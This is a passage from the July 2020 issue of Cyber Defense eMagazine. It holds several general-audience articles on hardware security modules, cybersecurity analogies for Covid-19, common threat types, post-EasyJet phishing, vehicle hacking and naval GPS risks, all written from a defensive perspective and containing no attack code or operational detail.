heavily secured data.<br />
Another important device-specific application for these Swissbit solutions is Trusted Boot. Trusted Boot<br />
ensures that software can only be run on specific hardware or hardware classes. A secure flash memory<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 67<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
card can be used to manage software licensing and feature activation. Access control, code encryption<br />
or digital signature allow the definition and management of different software configurations for products.<br />
Retrofittable and future-proof<br />
In comparison to a soldered TPM, the idea of a pluggable security module might at first seem unusual.<br />
However, older machinery and systems generally have a USB interface or interfaces for memory cards<br />
(Fig. 2). Therefore, the big advantage of using pluggable security modules is that existing devices can<br />
easily be retrofitted and secured using Swissbit security memory.<br />
This ability to retrofit devices offers another advantage in the constant race to keep up with cyber security.<br />
Attack and defense methods develop cyclically and harmonizing them with for example the project<br />
lifecycle of an industrial plant is challenging. A situation could arise where it necessary to allocate a new<br />
ID with improved cryptography technologies to the M2M communication participants. Swissbit’s<br />
retrofittable solution makes this possible.<br />
Fig 2. Memory interfaces, such as USB, can be used to retrofit a TPM function.<br />
Outlook<br />
In response to the rapidly increasing market demand for embedded IoT, Swissbit opened its new factory<br />
in October 2019, located in Berlin, Germany. This factory is equipped with state-of-the-art advanced 3D<br />
chip scale packaging technology, developing and producing customized system-in-package and multichip<br />
module designs for its customers. This technology facilitates not only the integration of<br />
microcontrollers, NAND chips and crypto chips, but also sensors, wireless chips and antennas. Using<br />
memory interfaces with TPM and encryption components for security solutions might only be the<br />
beginning, with the scope for the addition of further functionalities that can be miniaturized and integrated.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 68<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Hubertus Grobbel is the Vice President Security Solutions,<br />
at Swissbit<br />
Hubertus can be reached online at [email]<br />
and at our company website https://swissbit.com/en/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 69<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How To Fight A Virus: Lessons From <strong>Cyber</strong>security<br />
By Yotam Gutman, SentinelOne<br />
There has been a great deal of conversation around the similarities between the spread of the Covid-19<br />
virus and that of computer viruses. And indeed, as the first global pandemic to occur during the age of<br />
connectivity, this comparison is valid. But while most focus on how we can leverage the knowledge gained<br />
in the “real world” in identifying and stopping the spread of plagues in the virtual world, I would like to<br />
offer another perspective.<br />
Perhaps we in cybersecurity can return the favor. Perhaps the medical world can take the lessons learned<br />
in three decades of fighting “cyber viruses” and implement these in their fight to mitigate the Coronavirus?<br />
History<br />
Originally, the type of computer software described as “a program that can infect other programs by<br />
modifying them to include a, possibly evolved, version of itself” was named “Virus” by Fred Cohen in his<br />
1986 Ph.D. thesis. Another biological reference made its way into the computer lingo when the first worm<br />
was unleashed (although the phrase was used in an earlier sci-fi novel).<br />
In the last couple of years, computer viruses, or more widely the panoply of malware as we think of<br />
cybersecurity today, have undergone rapid evolution that has made them much more difficult to identify<br />
and mitigate:<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 70<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
More variants: 439,000 new malware variants were detected in 2019. That’s a 12.3% increase over the<br />
previous year.<br />
More capable: Modern malware threats are far more capable than the old viruses spreading through<br />
illegal copies of software distributed via floppy-disks. Today’s malware can steal passwords, exfiltrate<br />
sensitive data, encrypt and delete data, and much more.<br />
Harder to detect: Malware authors work hard to make their software difficult to detect. This includes hiding<br />
it in legitimate documents (aka “weaponizing” Word, PDF and Excel documents), utilizing detectionevasion<br />
mechanisms (like avoiding execution in sandboxed environments), and using legitimate software<br />
update mechanisms, all to make the work of the defenders harder.<br />
More aggressive: Some malware types are extremely aggressive; they scan for open RDP ports, bruteforce<br />
their way onto a device, and then move laterally within the organization’s network, abusing<br />
password-protected servers and seeking sensitive data, all without the knowledge of the victim.<br />
Fast: contemporary malware is extremely fast and works at machine-speed to bypass protection<br />
mechanisms and achieve its goals—ransomware like “WannaCry” disabled entire organizations in<br />
minutes.<br />
Adopting <strong>Cyber</strong>security Response to Fight Covid-19<br />
To mitigate today’s plethora of rapidly evolving cyber threats, the cybersecurity industry has developed<br />
several methodologies. These (after adaptation) could be used to reduce the spread of malicious<br />
software and to mitigate its effects. I will refrain from discussing the obvious virus/Anti-virus analogy.<br />
Obviously, a vaccine for a computer “virus” would be the answer, but estimates suggest that such a<br />
vaccine would not be available in the next 12-18 months, and there’s a lot we can do until then:<br />
Zero trust policy- A methodology that defies the traditional security assumption that everything inside the<br />
perimeter (protected by the firewall) is trusted. The main principle of Zero Trus is “never trust, always<br />
verify”. This means that every user is asked to verify their credentials every time they wish to “enter” the<br />
organization and that every file and process are being constantly monitored – even if they have been<br />
“authorized” to run on the computer.<br />
In a similar manner, humans should consider that other humans are carriers, and only “trust” them after<br />
they have been tested negative (or at the minimum, have had their temperature taken).<br />
Detection beats prevention: following a similar line of thought, most organizations today operate under<br />
the “Assume a Breach” paradigm. Instead of striving to identify and mitigate 100% of threats 100% of the<br />
time, they assume that some threats would be able to infect them and concentrate their efforts on quickly<br />
finding these and stopping them before they could do more harm.<br />
Similarly, it is prudent to assume that humanity would not be able to vanquish this virus, and we will be<br />
playing “whack-a-mole” with it for the foreseeable time. Given that this is the case, it’s prudent to invest<br />
in rapid detection of the infection (quick detection kits, even home detection kits), ensure those that are<br />
sick are given quick treatment, and continue to monitor the entire population for outbreaks.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 71<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Segmentation; an important principle that limits the “movement” within the organization, so that intruders<br />
cannot move freely and infect other parts of the organization.<br />
The real-life manifestation would be to identify infection “hot-spots”, lock these down and then tend to<br />
these infected rather than to lock-down entire countries.<br />
Risk modeling: it might be possible, perhaps, to provide 100% security, 100% of the time, but the cost to<br />
the organization would be detrimental; either the security costs would be through the roof, or the security<br />
restrictions imposed to maintain 100% security would cause the business to stand still. Instead, a CISO<br />
conducts risk assessments and prioritizes security spending to mitigate the most acute threats and<br />
secure the most valuable assets.<br />
Healthcare officials should do the same and ensure that the most sensitive segments of the population<br />
(elderly, sick) are being shielded from the disease and if need be, are provided with better care.<br />
Intelligence intake: fighting a stealthy enemy is hard because you don’t know what to expect. Security<br />
professionals, governments, and those in the security industry have been formally and informally sharing<br />
information about malware, cybercrime groups, and data leaks for a long time. This has proved to be<br />
immensely helpful in fighting and defeating cybercrime rings.<br />
Such collaboration should also be adopted by global scientific, medical communities, governments, and<br />
healthcare organizations. As this threat is new to humanity, we should all share information about<br />
detection and treatment mechanisms and notify others when we think we’ve made breakthroughs in<br />
finding a cure or a vaccine.<br />
Conclusion<br />
We can debate the similarities between biological and computer “Virus” (which, some believe, more<br />
resembles a Bacteria than a virus), but the analogy is, for the most part, correct. Viruses are dangerous<br />
to the victims, and they spread quickly through the population until a cure, or a vaccine is found. The<br />
spread of the Coronavirus pandemic and its impact on our lives is nothing like the world has seen before.<br />
It spread almost at machine speed and overwhelmed countries and healthcare organizations. We believe<br />
that utilizing the lessons learned by the cybersecurity industry in the past 3 decades could help to thwart<br />
the Coronavirus pandemic.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 72<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Lt. Commander (Ret.) Israel Navy, Yotam Gutman, has<br />
filled several operational, technical, and business positions<br />
at defense, HLS, Intelligence, and cybersecurity<br />
companies, and provided consulting services for numerous<br />
others. Yotam joined SentinelOne 6 months ago to oversee<br />
local marketing activities in Israel and contribute to the<br />
global content marketing team. Yotam founded and<br />
managed the <strong>Cyber</strong>security Marketing Professionals<br />
Community, which includes over 300 marketing professionals from more than 170 cyber companies.<br />
Yotam was chosen as one of the 5 Security Influencers to Follow on LinkedIn.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 73<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How to Combat <strong>Cyber</strong>security Attacks & <strong>Cyber</strong> Warfare<br />
By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn<br />
It’s no secret that cybersecurity attacks and cyber warfare are real challenges and threats to the safety<br />
of individuals, businesses, organizations — and especially the government. Personal and professional<br />
data, including passwords, credit card and bank account information, and Social Security numbers can<br />
be vulnerable. Plus, it can take months — even years — to recover from cyberattacks and cases of<br />
identity theft. According to CNBC, cyberattacks cost businesses of all sizes an average of $200,000, and<br />
“60% go out of business within six months of being victimized.”<br />
A professor of business technology predicted in a recent Forbes article that cyberattacks will be more<br />
prevalent in <strong>2020</strong> “because it’s the cheapest, easiest, fastest, and most effective form of warfare we’ve<br />
ever seen, and because cyberwarfare defenses are more vulnerable than they’ve ever been.”<br />
But what is cyber warfare, exactly? The RAND Corporation defines the term as “the actions by a nationstate<br />
or international organization to attack and attempt to damage another nation’s computers or<br />
information networks through, for example, computer viruses or denial-of-service attacks.”<br />
There are many types of attacks and warfare, including phishing, ransomware, and mobile- and cloudbased<br />
attacks. We’ll outline some of the most common and offer solutions to help you take the necessary<br />
precautions and steps toward securing your data and private information.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 74<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
What Are the Different Types of Threats?<br />
Phishing<br />
The U.S. Securities and Exchange Commission defines phishing as “the use of fraudulent emails and<br />
copy-cat websites to trick you into revealing valuable personal information — such as account numbers<br />
for banking, securities, mortgage, or credit accounts, your Social Security numbers, and the login IDs<br />
and passwords you use when accessing online financial services providers.”<br />
The goal, of course, is to use your personal information to steal your money and/or your identity. Phishing<br />
also targets short message service (text messages) — and there’s also the possibility of “spearfishing by<br />
video,” which allows hackers to “leverage new tools such as ‘deep fake’ technology to look and sound<br />
like a trusted person (e.g., a Facetime with an attacker posing as a CEO).”<br />
An article about <strong>2020</strong> cybersecurity predictions from SC Media predicts that “company microtargeting<br />
with industry-specific tools will rise.” It’s more important than ever that organizations have the proper<br />
controls in place to educate their employees and detect these kinds of threats.<br />
Ransomware<br />
The Department of Homeland Security defines ransomware as “a type of malicious software, or malware,<br />
designed to deny access to a computer system or data until a ransom is paid. Ransomware typically<br />
spreads through phishing emails or by unknowingly visiting an infected website.”<br />
According to a recent Forbes article, business ransomware attacks were on the rise in the first quarter of<br />
2019, and the trend is expected to continue in <strong>2020</strong> because “as the FBI softens its stance on businesses<br />
paying ransoms, the number of ‘successful’ ransomware attacks (i.e. those in which the ransom is paid)<br />
will double, with total losses of all reported attacks increasing significantly.”<br />
Mobile Attacks<br />
The Pew Research Center estimates that more than 5 billion people around the globe have mobile<br />
devices (over half of which are smartphones), and according to HubSpot, 52% of web traffic around the<br />
world is mobile.<br />
With so much widespread cell phone ownership and use, it’s no wonder that hackers are threatening<br />
mobile devices. According to Lookout, “traditional secure email gateways block potential phishing emails<br />
and malicious URLs, which works for protecting corporate email from account takeover attacks, but<br />
neglects mobile attack vectors, including personal email, social networking, and other mobile centric<br />
messaging platforms such as secure messaging apps and SMS/MMS.”<br />
It’s also worth noting that with every new piece of technology (such as the latest smartphone model)<br />
comes security challenges. For example, the debut of 5G means new problems with malware aiming to<br />
take advantage of the security features, according to AVG.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 75<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Cloud-Based Attacks<br />
According to Threatpost, “as more corporate infrastructure moves to the cloud, so will the focus of<br />
criminals.” This means that while conducting an attack will be more of a challenge, attacks may become<br />
more sophisticated and more common.<br />
Businesses and organizations are also more confident when it comes to the cloud. But confidence doesn’t<br />
always translate to tighter security measures. According to Forbes, “60% of organizations don’t<br />
understand the shared responsibility model when it comes to who secures workloads in the cloud. This<br />
will create a false sense of security in cloud security providers by their customers, as the latter are<br />
responsible for securing privileged access to their cloud administration accounts and workloads.”<br />
Artificial Intelligence and Voice Phishing<br />
As technology becomes more advanced, so do the types of cyberattacks. For example, “deepfake<br />
technology” can be used to exploit people in scams. According to MSNBC, the term deepfake refers to<br />
instances where creators have produced digital content by manipulating images, voices, images — and<br />
even create fake videos that look real. In one instance, according to Forbes, a CEO gave up $243,000<br />
due to a deepfake scam.<br />
An article about <strong>2020</strong> cybersecurity predictions in SC Magazine asserts that “voice phishing will become<br />
the new phishing bait.” In other words, it’s now easier than ever for scammers to sound like someone<br />
else. High-level people such as executives and politicians are expected to face heightened risk with<br />
advanced deepfake technology. Those scammers can then leave voicemails (or speak directly with<br />
callers) asking for donations or for personal information.<br />
How to Protect Yourself: Solutions & Tips<br />
There are many ways to protect yourself — and your business or organization — from cyberattacks and<br />
cyberwarfare. The Department of Homeland Security (DHS) is a good place to start and provides the<br />
following tips:<br />
• Maintain up-to-date software and operating systems<br />
• Ensure that your passwords are strong<br />
• Remain vigilant and watch out for suspicious activity<br />
• Do not click on links or open emails if you’re unsure<br />
• Do not provide personal information<br />
• Use secure internet connections<br />
• Back up your folders and files<br />
• Protect your home and/or business network<br />
Protecting your email is especially important. Investing in a good email archiving solution can also help<br />
you mitigate a potential attack by offering backup and disaster recovery options.<br />
It’s also important to be aware of the types of email messages you’re receiving. Poor spelling and<br />
grammar, mismatched URLs, messages asking for personal information, and notes where you didn’t<br />
initiate the action are just some examples of signs of a possible phishing attack.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 76<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Even though DHS recommends using two methods of verification, many other resources recommend<br />
multi-factor authentication. This means that a computer (or mobile device) will only grant you access after<br />
you present at least two pieces of “evidence” that only you would know or have access to.<br />
“Evidence” includes information such as passwords and PIN numbers or physical characteristics such as<br />
(fingerprint, voice recognition, etc.) The authentication could also be a physical item, such as a security<br />
token.<br />
Many organizations are also adopting Disaster Recovery-as-a-Service (DRaaS), which is “defined as<br />
providing a remotely hosted disaster recovery service to protect a business’s data and applications,”<br />
according to Carbonite.<br />
With the sheer volume and variety of cyberattacks and warfare targeting individuals and organizations,<br />
it’s more important than ever to take the appropriate precautions to ensure that personal information and<br />
data remains secure and safe.<br />
About the Author<br />
Adnan Olia, Chief Operating Officer and Co-owner of Intradyn<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 77<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
COVID-19 And the Easyjet Hack - A Perfect Phishing<br />
Storm<br />
By Shachar Daniel, Safe-T’s CEO<br />
As if the airline industry didn’t have enough to worry about at the moment, on May 19, EasyJet, the UK’s<br />
biggest budget airline announced it had been breached. Exposed in the attack were the email addresses<br />
and travel information for 9 million customers. A small group of customers also had their credit card<br />
details, including the CVV, exposed in the attack which lasted from October 2019-March <strong>2020</strong>.<br />
Although EasyJet first learned about the attack in January, they only began informing those customers<br />
whose credit card information was exposed in April. The airline said they did not disclose the attack earlier<br />
due to the complexity involved in piecing together which systems and which individuals had been<br />
affected. According to the UK's Information Commissioner's Office, “This was a highly sophisticated<br />
attacker. It took time to understand the scope of the attack and to identify who had been impacted."<br />
Bad Timing - COVID-19 and Airline Scams<br />
The EasyJet hack just happens to come at a spectacularly rotten time, as airlines around the world,<br />
EasyJet included, are dealing with severe losses due to COVID-19. According to Dr Jason Nurse of the<br />
Kent Interdisciplinary Research Center, “It is clearly a difficult time for the travel industry considering the<br />
impact of COVID-19 on operations. A cyber-attack is the last thing an airline would want to deal with<br />
now.”<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 78<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
To make matters even more complicated, authorities have warned customers to be on the lookout for<br />
phishing emails offering refunds on flights, now that their personal details may be up for grabs on the<br />
darkweb. According to privacy expert Ray Walsh, "Anybody who has ever purchased an EasyJet flight is<br />
advised to be extremely wary when opening emails from now on...Phishing emails that leverage data<br />
stolen during the attack could be used as an attack vector at any point in the future.”<br />
In fact, a recent statement from EasyJet compelled customers to think critically when opening EasyJet<br />
emails, saying "We are advising customers to be cautious of any communications purporting to come<br />
from EasyJet or EasyJet Holidays."<br />
But EasyJet was not the only airline to have phishing campaigns associated with it over the course of the<br />
pandemic. As the impact of COVID-19 began to take hold in late March and airlines started canceling<br />
flights, Emirates Airlines warned customers about circulating fake flight refund emails and email security<br />
provider Mimecast alerted authorities to a major uptick in flight-related email scams involving a variety of<br />
airlines. Other security firms noted a rise in voice-based flight cancellation scams, wherein scammers,<br />
posing as airline agents, called random people to discuss purported flight cancellations, and in the<br />
process, tried extracting personal information.<br />
And now, as airlines across the world attempt to cut their losses, they are offering heavy discounts on<br />
flights, for whenever regular flights do resume. As inboxes fill up with enticing promotions offering deals<br />
on future flights, customers should remember that while many of these emails are legitimate, a significant<br />
portion are phishing emails, cashing in on the confusion created in COVID-19.<br />
How to Spot a Travel-Based Phishing Email<br />
Meanwhile, it’s important to note that since travel information was included in the stolen EasyJet data<br />
set, phishing emails sent to those customers may be highly targeted and include real elements, like dates<br />
and destinations, making the emails seem legitimate. If your data was exposed in the EasyJet hack, there<br />
are some relatively simple ways to protect yourself from falling prey to the ensuing phishing threats.<br />
What’s more, these tips can be just as easily applied to any trending COVID-19 airline email scams out<br />
there today. So when you get flight promotions or cancellation notices, be sure to:<br />
- Look at the sender's email address - does it match the name of the airline or is it slightly off? For<br />
example, if it says EasyJetTravel.com, JetBlueFlights.com, or SouthWestTickets.com, you can<br />
rest assured it’s a scam.<br />
-<br />
- Avoid any email requesting personal information, such as credit card information, dates of birth,<br />
or social security numbers.<br />
-<br />
- Delete messages that include links or attachments, which are often filled with malware payloads.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 79<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
- Think twice when it comes to promotions requiring the reader to take action NOW! Scammers try<br />
to get their targets to act impulsively, before critical thinking can get in the way. If there’s no time<br />
to make a thought-out decision, that's a bad sign.<br />
COVID-19 is waning and the world is starting to open up again. This is great news for consumers as well<br />
as the airline industry—but as always, remember that scammers love to capitalize on fluctuating<br />
circumstances—so proceed with caution before booking any deals.<br />
About the Author<br />
Shachar Daniel is the CEO at Safe-T and one of its cofounders.<br />
In his role, he is responsible for the overall vision,<br />
company strategy, day-to-day operations, and for growing<br />
Safe-T’s business and presence around the world. Shachar<br />
brings to Safe-T more than 14 years of experience in various<br />
managerial and business roles. Prior to founding Safe-T, he<br />
was program manager at Prime-sense, head of operations for project managers at Logic and project<br />
manager at Elbit Systems. He is an experienced manager with a passion and high commitment for project<br />
delivery. Shachar holds an Executive MBA from The Hebrew University, an MBA from The College of<br />
Management Academic Studies in Israel and a B.Sc. in Industrial Engineering from The Holon Institute<br />
Technology.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 80<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Should We Be Worried About Vehicle Hacking?<br />
And what can we do about it?<br />
By Martin Banks<br />
With more connected devices than ever, cybersecurity is a more prominent issue today than ever before.<br />
You'll see articles and discussions about security for computers, smartphones and wearables, but these<br />
may not cover everything. As more vehicles are including internet-based functions, should we be worried<br />
about vehicle hacking?<br />
Ten years ago, this question would seem like nothing but science fiction. Now that we're on the cusp of<br />
the driverless vehicle revolution, though, it may require some attention. Here's a closer look at connected<br />
cars and whether they present a cybersecurity risk.<br />
The Rise of the Connected Car<br />
To understand the gravity that vehicle hacking may present, you first have to know how prevalent<br />
connected vehicles are. When you look at the data, you realize these technologies may be more<br />
widespread than you thought. There were more than 50 million shipments of connected cars in 2019, up<br />
45% from the year prior.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 81<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
With an adoption rate like that, it won't be long before connected cars cover the roads. Not everyone<br />
needs to drive an internet-enabled vehicle for them to impact everyone, either. Any hacked automobile<br />
endangers nearby drivers and passengers, so even with a low penetration rate, they could be risky.<br />
Cars aren't the only connected vehicles out there, either. Other modes of transportation, like ships, are<br />
also becoming increasingly connected.<br />
How Are Vehicles Vulnerable?<br />
It's evident, then, that there are enough connected vehicles for hacking to be a concern. The number of<br />
potential targets isn't the only factor at play, though. You also have to consider what makes these cars<br />
targets in the first place.<br />
The answer to this one is relatively straightforward. You can hack almost anything with an internet signal,<br />
especially if it's an active connection. Internet-based functions in cars, like online radio, are active as they<br />
send and receive commands, meaning you can hack them.<br />
Some vehicles use Internet of Things (IoT) devices to do things like track engine performance or measure<br />
fuel efficiency. These sensors provide hackers with another point of entry if they don't include proper<br />
security features.<br />
Is There a Precedent for Vehicle Hacking?<br />
So has anyone hacked into a vehicle before? Yes, and vehicle hacking incidents may be more frequent<br />
than you'd think. According to the cybersecurity firm Upstream, there were roughly 150 car hacking<br />
incidents in 2019.<br />
Considering how many connected cars there are, that figure isn't that massive. You should also consider<br />
that this number also includes hacks on automotive companies, not just cars themselves. Still, it<br />
represents a 99% increase over 2018's hacking incidents, which is a troubling trend.<br />
While these real-world instances may not have been too harmful, tests show that they could be. In 2015,<br />
hackers remotely cut the power of a Jeep as it was driving in a demonstration for Wired. If this were to<br />
happen outside of a safety showcase, it could have disastrous results.<br />
Responses from Manufacturers<br />
Some good news is that vehicle manufacturers are aware of these potential risks. After the 2015 Wired<br />
hacking demonstration, Fiat Chrysler sent 1.4 million car owners flash drives containing software patches.<br />
Similarly, Tesla updated all Model Xs after researchers hacked into one and activated its brakes.<br />
Both of these instances involve manufacturers responding to an issue they initially missed. Had malicious<br />
actors exploited these problems before white-hat hackers, they could've been much more severe issues.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 82<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Still, with these cases attracting media attention, more manufacturers will take cybersecurity seriously<br />
while in production.<br />
As vehicles become more teched-out, it means more tech experts are involved in the design and<br />
production process. With the presence of these voices, manufacturers could take a greater interest in<br />
cybersecurity.<br />
Defending Against Vehicle Hacking<br />
Drivers of connected cars aren't helpless concerning cybersecurity. Built-in cybersecurity systems are a<br />
necessary step in vehicle production, but drivers can protect themselves in other ways. The rising<br />
concerns over vehicle cybersecurity have led to the emergence of companies selling third-party security<br />
solutions for cars.<br />
Operators using IoT devices in their vehicles should ask the device providers about security features.<br />
Experts also recommend that they require transparency and high standards from any company that<br />
receives data from these sensors. Fleets shouldn't work with any business that doesn't showcase<br />
appropriate data governance.<br />
If more owners and drivers speak up about security issues, manufacturers will likely respond to the market<br />
pressure. As the public shows interest in security, the producers will offer it.<br />
Security Expert Recommendations<br />
To recap everything we've established so far: hacking vehicles is possible and has some precedent, and<br />
manufacturers are addressing the issue. Additionally, drivers can protect themselves as a supplementary<br />
layer of security. The last step in deciding whether this is a cause for worry is looking to the experts. So<br />
what do they think?<br />
<strong>Cyber</strong>security authorities have become increasingly concerned with vehicle hacking in the past few years.<br />
Late last year, the Federal Bureau of Investigation (FBI) warned of growing cyberthreats in the automotive<br />
industry. The Bureau cited the increase of data coming from vehicles as a reason why hackers may target<br />
cars.<br />
In response to these threats, the FBI suggested auto companies take cybersecurity more seriously.<br />
Notice they didn't say to abandon the concept of a connected car altogether. Manufacturers should just<br />
keep security at the forefront.<br />
Vehicle <strong>Cyber</strong>security Today and Tomorrow<br />
With all these factors in mind, should we be worried about vehicle hacking? There may not be a cause<br />
for worry, but there is certainly reason for increased concern. This issue is a minor one right now, but it's<br />
also growing. It requires adequate attention, but not panic.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 83<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Vehicle hacking isn't a widespread problem today, but it could become one in the future. Manufacturers<br />
should start investing in more thorough security solutions as they add more internet-enabled functions to<br />
their automobiles. By addressing these issues today, we can stop a crisis tomorrow.<br />
The Age of IoT Brings New Challenges<br />
Technological revolutions always come with some growing pains. As the IoT becomes more prevalent,<br />
cybersecurity likewise turns into a more pressing concern. That doesn't mean we should avoid the era of<br />
connectivity, but that we should take care to secure it.<br />
You shouldn't worry about vehicle hacking, but you should take it seriously. With a widespread effort to<br />
combat security issues before they appear, the future of connected vehicles will come sooner.<br />
About the Author<br />
Martin Banks is the founder and Editor-in-Chief of Modded. You can find<br />
his writing all over the internet. He covers tech, gear, cars, and more.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 84<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> Attacks at Sea: Blinding Warships.<br />
Are GPS completely vulnerable to cyberattacks?<br />
By Julien Chesaux, <strong>Cyber</strong> Security Consultant, Kudelski Security<br />
Who Controls the Sea, Controls the World<br />
The annual multilateral exercise between the U.S. and Thai army, named “Cobra Gold”1 sees the<br />
deployment of the latest navy warships as a proof of military domination in a contested region and<br />
reminds us the fragility of technologies at sea as a chain of incidents demonstrated in 2017.<br />
The world’s oceans can be beautiful and awe-inspiring, but also very dangerous. Most importantly, they<br />
are strategic for the global economy and, consequently, countries compete to control them. Statistics<br />
reveal the high value of the high seas: 70% of the globe is covered by water and over 90% of the world’s<br />
trade is carried by sea. Moreover, the global merchant fleet totals 50,000 ships that move 9 billion tons<br />
of merchandise annually, representing a turnover of $2,000 billion.2<br />
Human history is punctuated with many regional or global exchanges that happened through decisive<br />
battles at sea. The battle of Salamin saw the Athenians saving the concept of democracy against the<br />
Persians. The battle of Actium allowed the Roman Republic to become an Empire. The battle of Trafalgar<br />
destroyed Napoleon’s aspiration to invade Britain.<br />
At the beginning of the 20th century, in 1905, the battle of Tsushima humiliated the Russian Empire and<br />
opened the pathway for an Imperial Japan. During WWI, the battle of Jutland contained the Imperial<br />
1<br />
WILLIAMS Zachary. “Cobra Gold <strong>2020</strong>: America’s Strategic Shift in Southeast Asia”, The Diplomat, Mar 6, <strong>2020</strong><br />
https://thediplomat.com/<strong>2020</strong>/03/cobra-gold-<strong>2020</strong>-americas-strategic-shift-in-southeast-asia/<br />
2<br />
Sea Europe. “2017 Market Forecast Report”, Sea Europe, 2016<br />
https://maritimetechnology.nl/media/2017-Market-Forecast-Report-finaal.pdf<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 85<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
German Navy and WWII witnessed the battle of Midway that established the U.S. as the new navy<br />
superpower after the destruction of Japanese’s aircraft carriers fleet in the Pacific. More recently, the<br />
Crimea annexation by Russia was, even if triggered by different causes, a geopolitical move to avoid the<br />
loss of access to the Mediterranean Sea.<br />
The current hawkish posture and the “gunboat diplomacy” followed by China is not a surprise regarding<br />
its ambitions to play a greater global leadership role, to protect its shores where most of its economic<br />
activity occurs (its “strategic belt”), and to defend its natural resources and sea lines to supply them from<br />
the South and East China Seas (represented by the Nine-Dash) to the Indian Ocean (currently projected<br />
as the “String of Pearls”3).<br />
A Global Rivalry with Multiple Bottlenecks<br />
Because globalization increases global trade, sea roads are busy and multiple bottlenecks are under the<br />
spotlight, including many straits and canals. For instance, the Strait of Malacca represents 40 % of global<br />
trade, 50% of energy trade, and is indispensable for regional hegemons like China and Japan.<br />
Another geostrategic path is the Strait of Hormuz, between Oman and Iran, through which all the Gulf oil<br />
trade moves. In this region, the U.S. Navy is face-to-face with the Iranian one. The USS Harry S. Truman<br />
aircraft carrier is presently deployed in the Arabian Sea (near Oman) as part of the U.S. 5th fleet, which<br />
covers the Middle East, a crucial region for the U.S. as 18% of its imported oil comes from the Persian<br />
Gulf countries.4 In 1967, the blockade of the Strait of Tiran by Egypt was used as casus belli by Israel<br />
